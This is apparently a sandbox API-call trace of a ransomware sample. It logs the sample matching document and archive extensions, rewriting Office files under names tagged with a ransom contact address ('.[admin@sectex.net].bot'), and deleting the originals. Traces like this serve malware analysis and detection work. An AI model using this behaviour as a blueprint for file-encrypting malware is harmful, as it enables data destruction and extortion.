	[0036.005] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1
	[0036.005] lstrlenW (lpString=".bz2") returned 4
	[0036.005] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1
	[0036.005] lstrlenW (lpString=".7z") returned 3
	[0036.005] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1
	[0036.005] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 75
	[0036.005] lstrlenW (lpString=".dbf") returned 4
	[0036.005] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1
	[0036.410] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0036.411] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\ado210.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c
	[0036.411] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fc6c | out: lpNewFilePointer=0x0) returned 1
	[0036.411] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fc2c | out: lpNewFilePointer=0x0) returned 1
	[0036.411] ReadFile (in: hFile=0x19c, lpBuffer=0xaa60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x981fc38, lpOverlapped=0x0 | out: lpBuffer=0xaa60058*, lpNumberOfBytesRead=0x981fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0036.415] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x981fc2c | out: lpNewFilePointer=0x0) returned 1
	[0036.416] ReadFile (in: hFile=0x19c, lpBuffer=0xaaa0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x981fc38, lpOverlapped=0x0 | out: lpBuffer=0xaaa0058*, lpNumberOfBytesRead=0x981fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0036.419] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x981fc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0036.419] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x981fc2c | out: lpNewFilePointer=0x0) returned 1
	[0036.419] ReadFile (in: hFile=0x19c, lpBuffer=0xaae0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x981fc38, lpOverlapped=0x0 | out: lpBuffer=0xaae0058*, lpNumberOfBytesRead=0x981fc38*=0x40000, lpOverlapped=0x0) returned 1
	[0036.435] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0036.435] WriteFile (in: hFile=0x19c, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x981fcb0, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fcb0*=0xc0100, lpOverlapped=0x0) returned 1
	[0036.972] SetEndOfFile (hFile=0x19c) returned 1
	[0036.972] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb748
	[0036.972] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.972] WriteFile (in: hFile=0x19c, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x981fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0x981fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.974] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x88bff, lpNewFilePointer=0x0, dwMoveMethod=0x981fc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.974] WriteFile (in: hFile=0x19c, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x981fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0x981fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.976] SetFilePointerEx (in: hFile=0x19c, liDistanceToMove=0x15a3ff, lpNewFilePointer=0x0, dwMoveMethod=0x981fc7c | out: lpNewFilePointer=0x0) returned 1
	[0036.976] WriteFile (in: hFile=0x19c, lpBuffer=0xb4fb748*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x981fc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb748*, lpNumberOfBytesWritten=0x981fc88*=0x40000, lpOverlapped=0x0) returned 1
	[0036.978] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb748 | out: hHeap=0x7d60000) returned 1
	[0036.978] CloseHandle (hObject=0x19c) returned 1
	[0037.814] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.814] lstrlenW (lpString=".doc") returned 4
	[0037.814] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.814] lstrlenW (lpString=".docx") returned 5
	[0037.814] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1
	[0037.814] lstrlenW (lpString=".pdf") returned 4
	[0037.814] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.814] lstrlenW (lpString=".xls") returned 4
	[0037.814] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.814] lstrlenW (lpString=".xlsx") returned 5
	[0037.814] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1
	[0037.814] lstrlenW (lpString=".ppt") returned 4
	[0037.814] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.814] lstrlenW (lpString=".zip") returned 4
	[0037.814] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.814] lstrlenW (lpString=".rar") returned 4
	[0037.814] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.814] lstrlenW (lpString=".bz2") returned 4
	[0037.814] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.814] lstrlenW (lpString=".7z") returned 3
	[0037.814] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.814] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.815] lstrlenW (lpString=".dbf") returned 4
	[0037.815] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.815] lstrlenW (lpString=".1cd") returned 4
	[0037.815] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.815] lstrlenW (lpString=".jpg") returned 4
	[0037.815] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.815] lstrlenW (lpString=".doc") returned 4
	[0037.815] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString=".docx") returned 5
	[0037.815] lstrcmpiW (lpString1=".docx", lpString2="0.CHM") returned -1
	[0037.815] lstrlenW (lpString=".pdf") returned 4
	[0037.815] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString=".xls") returned 4
	[0037.815] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString=".xlsx") returned 5
	[0037.815] lstrcmpiW (lpString1=".xlsx", lpString2="0.CHM") returned -1
	[0037.815] lstrlenW (lpString=".ppt") returned 4
	[0037.815] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.815] lstrlenW (lpString=".zip") returned 4
	[0037.815] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString=".rar") returned 4
	[0037.815] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString=".bz2") returned 4
	[0037.815] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.815] lstrlenW (lpString=".7z") returned 3
	[0037.815] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.815] lstrlenW (lpString=".dbf") returned 4
	[0037.815] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.815] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.816] lstrlenW (lpString=".1cd") returned 4
	[0037.816] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.816] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ADO210.CHM") returned 71
	[0037.816] lstrlenW (lpString=".jpg") returned 4
	[0037.816] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.816] lstrcmpiW (lpString1=".CHM", lpString2=".bot") returned 1
	[0037.816] lstrlenW (lpString="PSS10R.CHM") returned 10
	[0037.816] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.899] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=27195) returned 1
	[0037.899] CloseHandle (hObject=0x1b4) returned 1
	[0037.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 0x20
	[0037.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.899] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.899] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.899] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.899] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4
	[0037.899] GetLastError () returned 0x0
	[0037.900] ReadFile (in: hFile=0x1b4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x6a3b, lpOverlapped=0x0) returned 1
	[0037.901] WriteFile (in: hFile=0x1c4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x6a40, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x6a40, lpOverlapped=0x0) returned 1
	[0037.902] ReadFile (in: hFile=0x1b4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.902] WriteFile (in: hFile=0x1c4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0037.903] SetEndOfFile (hFile=0x1c4) returned 1
	[0037.903] CloseHandle (hObject=0x1c4) returned 1
	[0037.903] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.904] SetEndOfFile (hFile=0x1b4) returned 1
	[0037.904] CloseHandle (hObject=0x1b4) returned 1
	[0037.904] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.905] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\pss10r.chm")) returned 1
	[0037.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.905] lstrlenW (lpString=".doc") returned 4
	[0037.905] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.905] lstrlenW (lpString=".docx") returned 5
	[0037.905] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1
	[0037.905] lstrlenW (lpString=".pdf") returned 4
	[0037.905] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.905] lstrlenW (lpString=".xls") returned 4
	[0037.905] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.905] lstrlenW (lpString=".xlsx") returned 5
	[0037.905] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1
	[0037.905] lstrlenW (lpString=".ppt") returned 4
	[0037.905] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.905] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.905] lstrlenW (lpString=".zip") returned 4
	[0037.905] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.905] lstrlenW (lpString=".rar") returned 4
	[0037.905] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.905] lstrlenW (lpString=".bz2") returned 4
	[0037.905] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.906] lstrlenW (lpString=".7z") returned 3
	[0037.906] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.906] lstrlenW (lpString=".dbf") returned 4
	[0037.906] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.906] lstrlenW (lpString=".1cd") returned 4
	[0037.906] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.906] lstrlenW (lpString=".jpg") returned 4
	[0037.906] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.906] lstrlenW (lpString=".doc") returned 4
	[0037.906] lstrcmpiW (lpString1=".doc", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString=".docx") returned 5
	[0037.906] lstrcmpiW (lpString1=".docx", lpString2="R.CHM") returned -1
	[0037.906] lstrlenW (lpString=".pdf") returned 4
	[0037.906] lstrcmpiW (lpString1=".pdf", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString=".xls") returned 4
	[0037.906] lstrcmpiW (lpString1=".xls", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString=".xlsx") returned 5
	[0037.906] lstrcmpiW (lpString1=".xlsx", lpString2="R.CHM") returned -1
	[0037.906] lstrlenW (lpString=".ppt") returned 4
	[0037.906] lstrcmpiW (lpString1=".ppt", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.906] lstrlenW (lpString=".zip") returned 4
	[0037.906] lstrcmpiW (lpString1=".zip", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString=".rar") returned 4
	[0037.906] lstrcmpiW (lpString1=".rar", lpString2=".CHM") returned 1
	[0037.906] lstrlenW (lpString=".bz2") returned 4
	[0037.906] lstrcmpiW (lpString1=".bz2", lpString2=".CHM") returned -1
	[0037.906] lstrlenW (lpString=".7z") returned 3
	[0037.906] lstrcmpiW (lpString1=".7z", lpString2="CHM") returned -1
	[0037.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.907] lstrlenW (lpString=".dbf") returned 4
	[0037.907] lstrcmpiW (lpString1=".dbf", lpString2=".CHM") returned 1
	[0037.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.907] lstrlenW (lpString=".1cd") returned 4
	[0037.907] lstrcmpiW (lpString1=".1cd", lpString2=".CHM") returned -1
	[0037.907] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\PSS10R.CHM") returned 103
	[0037.907] lstrlenW (lpString=".jpg") returned 4
	[0037.907] lstrcmpiW (lpString1=".jpg", lpString2=".CHM") returned 1
	[0037.907] lstrcmpiW (lpString1=".XML", lpString2=".bot") returned 1
	[0037.907] lstrlenW (lpString="SETUP.XML") returned 9
	[0037.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.907] GetFileSizeEx (in: hFile=0x1b4, lpFileSize=0x981ff1c | out: lpFileSize=0x981ff1c*=9352) returned 1
	[0037.907] CloseHandle (hObject=0x1b4) returned 1
	[0037.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 0x20
	[0037.907] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0037.907] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4
	[0037.908] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.908] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.908] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4
	[0037.908] GetLastError () returned 0x0
	[0037.908] ReadFile (in: hFile=0x1b4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x2488, lpOverlapped=0x0) returned 1
	[0037.909] WriteFile (in: hFile=0x1c4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0x2490, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0x2490, lpOverlapped=0x0) returned 1
	[0037.910] ReadFile (in: hFile=0x1b4, lpBuffer=0xaa60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x981fed4, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesRead=0x981fed4*=0x0, lpOverlapped=0x0) returned 1
	[0037.910] WriteFile (in: hFile=0x1c4, lpBuffer=0xaa60020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x981fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaa60020*, lpNumberOfBytesWritten=0x981fc9c*=0xe6, lpOverlapped=0x0) returned 1
	[0037.910] SetEndOfFile (hFile=0x1c4) returned 1
	[0037.911] CloseHandle (hObject=0x1c4) returned 1
	[0037.911] SetFilePointerEx (in: hFile=0x1b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x981fec8 | out: lpNewFilePointer=0x0) returned 1
	[0037.911] SetEndOfFile (hFile=0x1b4) returned 1
	[0037.912] CloseHandle (hObject=0x1b4) returned 1
	[0037.912] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0037.912] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office.en-us\\setup.xml")) returned 1
	[0037.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.913] lstrlenW (lpString=".doc") returned 4
	[0037.913] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString=".docx") returned 5
	[0037.913] lstrcmpiW (lpString1=".docx", lpString2="P.XML") returned -1
	[0037.913] lstrlenW (lpString=".pdf") returned 4
	[0037.913] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString=".xls") returned 4
	[0037.913] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString=".xlsx") returned 5
	[0037.913] lstrcmpiW (lpString1=".xlsx", lpString2="P.XML") returned -1
	[0037.913] lstrlenW (lpString=".ppt") returned 4
	[0037.913] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.913] lstrlenW (lpString=".zip") returned 4
	[0037.913] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1
	[0037.913] lstrlenW (lpString=".rar") returned 4
	[0037.913] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString=".bz2") returned 4
	[0037.913] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString=".7z") returned 3
	[0037.913] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1
	[0037.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.913] lstrlenW (lpString=".dbf") returned 4
	[0037.913] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.913] lstrlenW (lpString=".1cd") returned 4
	[0037.913] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1
	[0037.913] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
	[0037.913] lstrlenW (lpString=".jpg") returned 4
	[0037.913] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1
	[0037.914] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office.en-us\\SETUP.XML") returned 102
